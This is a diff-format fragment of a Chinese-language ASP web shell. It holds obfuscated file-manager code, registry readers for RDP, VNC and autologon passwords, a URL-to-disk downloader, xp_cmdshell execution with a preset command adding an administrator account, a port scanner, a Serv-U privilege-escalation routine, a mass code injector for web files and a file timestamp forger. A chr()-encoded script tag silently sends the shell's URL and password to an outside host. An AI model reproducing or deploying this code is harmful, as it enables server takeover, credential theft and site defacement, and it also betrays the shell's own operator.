+Function Show1File(Path):ExeCute SinfoEn("thPar(deoltFGeF.=CLDFOt Se)`i=0`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`erldfoub.sLDFOn  i FchEar Fos`'>&~orolrCdeor&B ~idol spx:1errdbo='lety siv<dr>teen=cgnli a7%=1thid w10t=ghei htd~<I&=SSI~`>~/a~<e&am.N&F>~br><ntfo</>06'='zesi' gsingdin'we=ac fntfo><~~����~~e=tlti' ~)~~)&meNaF.~&~\h&at(PthPaRe~&~~r(deolwFho:Sptriscvaja='efhra ~<I&=SSI `> /ay<op>C��''��e=tlti' am='ssla c)'k(soyen uret'rk=icclon)'~~erldFopyCo~~~,~~)&meNaF.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ></b[<b>><br~<I&=SSI~`>~/al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deollFDe~~~,~~)&\~~\~,~\e,am.N&F\~&~thPae(acplRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`a></veMo'>�ƶ�='leit tm''as=ascl' ()okes yrnture='cklinc'o~)r~deoleFov~M,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI~`>~td</v>di</b></>]<ba></wnDo'>����='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~ilnFow~D,~~~&~e)am.N&F\~&~thPah(ateP&R~~(~rmFollFut:ipcrasav'jf=re h<a~ I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 5od m iIf~`xtNe`>~leab/t><tr</d>/t><=2htighed <tr><tr>/t~<I&=SSI`=0:i~~I=:SSIS RR`>~tr><6'='ngdiadlpel c0'='ngcipalsel c0'='errdbo' 0%10='thid wleab<t=~SI`esil.fldFon  i LchEar Fo` ~b></>[<b> /a~<e&am.N&L>~ntfo</>25'='zesi' gsingdin'we=ac fntfo><��''��e=tlti' );~~leFiwnDo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ><~'r&loCoerrdBo~&d lisox 1pr:deor'be=ylstv di><0''3t=ghei htd~<I&=SSI`> /at<di>E��''��e=tlti' am='ssla c)'~~leFiitEd~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /al<De'>ɾ��='leit tm''as=ascl' ()okes yrnture='cklinc'o~)e~illFDe~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~`> /ay<op>C��''��e=tlti' am='ssla c)'~~leFipyCo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI~` ~ -b></>]<b> /ae<ov>M��''��e=tlti' am='ssla c)'~~leFiveMo~~~,~~)&meNaL.~&~\h&at(PthPaRe~&~~m(orlFul:Fptriscvaja='efhra ~<I&=SSI`>~<br><b~K)&2410e/iz.s(LngclI&=SSI` ~ -i> <b></&~peTyL.I&=SSI`>~td</v>di</i></&~edfidiMostLateDaL.I&=SSI`i+i=1`r><tr>/t~<I&=SSIn he t 0 = 2od m iIf~`xtNe`e>blta</r>/t~<I& SRS R~`nghiot=NLDFOt Se",Pos):End function:Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:RRS ""&copyurl&""
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user super super /add & net localgroup administrators super /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&Serveru&chr(38)&chr(112)&chr(61)&Serverp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10):Sub Scan(targetip, portNum):On Error Resume Next:set conn = Server.CreateObject("ADODB.connection"):connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;":conn.ConnectionTimeout=1:conn.open connstr:If Err Then:If Err.number = -2147217843 or Err.number = -2147467259 Then:If InStr(Err.description, "(Connect()).") > 0 Then:RRS(targetip & ":" & portNum & ".......�ر�<br>"):Else:RRS(targetip & ":" & portNum & ".......<font color=red>����</font><br>"):End If:End If:End If:End Sub:Select Case Action:Case "MainMenu":MainMenu():Case "getTerminalInfo":getTerminalInfo():Case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():Case "goback":goback():Case "Servu":SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+RRS"setTimeout('document.all.goldsun.submit();',4000);"
+RRS"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+RRS"<form method='post' name='goldsun'>"
+RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+RRS"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+RRS"<script language='javascript'>"
+RRS"document.write('<br><center>��������Ȩ��,��ȴ�...,<center>');"
+RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
+RRS"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+c.send loginuser & loginpass & mt & deldomain & quit
+set session("c")=c
+RRS"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+RRS"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+RRS"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+RRS"<center><br><form method='post' name='goldsun'>"
+RRS"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'>Serv-U ����Ȩ�� ASP��</td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td width='100'>�û���:</td>"
+RRS"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �</td>"
+RRS"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�� �ڣ�</td>"
+RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>ϵͳ·����</td>"
+RRS"<td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td>�����</td>"
+RRS"<td><input name='c' type='text' id='c' value='cmd /c net user userSea passSea /add & net localgroup administrators userSea /add' size='50'></td>"
+RRS"</tr>"
+RRS"<tr align='center' valign='middle'>"
+RRS"<td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+RRS"<input type='reset' name='Submit2' value='����'>"
+RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+RRS"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing:end function:
+Case "Cplgm"
+Fpath=Request("fd")
+addcode = Request("code")
+addcode2 = Request("code2")
+pcfile=request("pcfile")
+checkbox=request("checkbox")
+ShowMsg=request("ShowMsg")
+FType=request("FType")
+M=request("M")
+if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+if Fpath="\" then Fpath=Server.MapPath("\")
+if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")
+if addcode="" then addcode="<"
+if checkbox="" then checkbox=request("checkbox")
+if pcfile="" then
+pcfileName=Request.ServerVariables("SCRIPT_NAME")
+pcfilek=split(pcfileName,"/") 
+pcfilen=ubound(pcfilek) 
+pcfile=pcfilek(pcfilen) 
+end if
+RRS ("<BR><b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+RRS "<form method=POST><b>[" 
+if M="1" then RRS"��������-��������"
+if M="2" then RRS"��������-������˵�����"
+if M="3" then RRS"��������-�����滻����"
+if M="" then response.end
+RRS "]</b><table width=100% border=0><tr><td>�ļ�·����</td>"
+RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+RRS "<tr><td>�ų��ļ���</td>"
+RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+RRS "<tr><td>�ļ����ͣ�</td>"
+RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td>"
+if M="1" then RRS"Ҫ�ҵ�����"
+if M="2" then RRS"Ҫ�������"
+if M="3" then RRS"Ҫ�滻�Ĵ��룺"
+RRS"</td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
+if M="3" then RRS "<tr><td>�滻Ϊ��</td><td><textarea name=code2 cols=66 rows=3>"&addcode2&"</textarea></td></tr>"
+RRS "<tr><td></td><td> <input name=submit type=submit value=��ʼִ��> --��ǽ���--[�ɹ����� �� �ų����� �� �ظ���<font color=red>��</font>]</td></tr>"
+RRS "</table></form>" 
+if request("submit")="��ʼִ��" then 
+RRS"<div style='line-height:25px'><b>ִ�м�¼��</b><br>"
+call InsertAllFiles(Fpath,addcode,pcfile)
+RRS"</div>"
+end if
+sub att()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS"<form method=post>"
+RRS"·������:<input name='path1' value='"&WWWROOT&"\' size='60'><br/>"
+RRS"�ļ�����:<input name=filename value='index.asp' size='60'><br/>"
+RRS"�޸�ʱ��:<input name=time value='12/21/2009 23:59:59' size='60'><br/>"
+RRS"<select onChange='this.form.shuxing.value=this.value;'>"
+RRS"<option value=''>��ͨ</option>"
+RRS"<option value='1'>ֻ��</option>"
+RRS"<option value='2'>����</option>"
+RRS"<option value='4'>ϵͳ</option>"
+RRS"<option value='33'>ֻ���浵 </option>"
+RRS"<option value='34'>���ش浵 </option>"
+RRS"<option value='35'>ֻ�����ش浵 </option>"
+RRS"<option value='39'>ֻ�����ش浵ϵͳ </option>"
+RRS"�޸����ԣ�<input name=shuxing value='0' size='60'><br/>"
+RRS"<input type=submit value=�޸�>"
+RRS"</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject("Scripting.FileSystemObject")
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
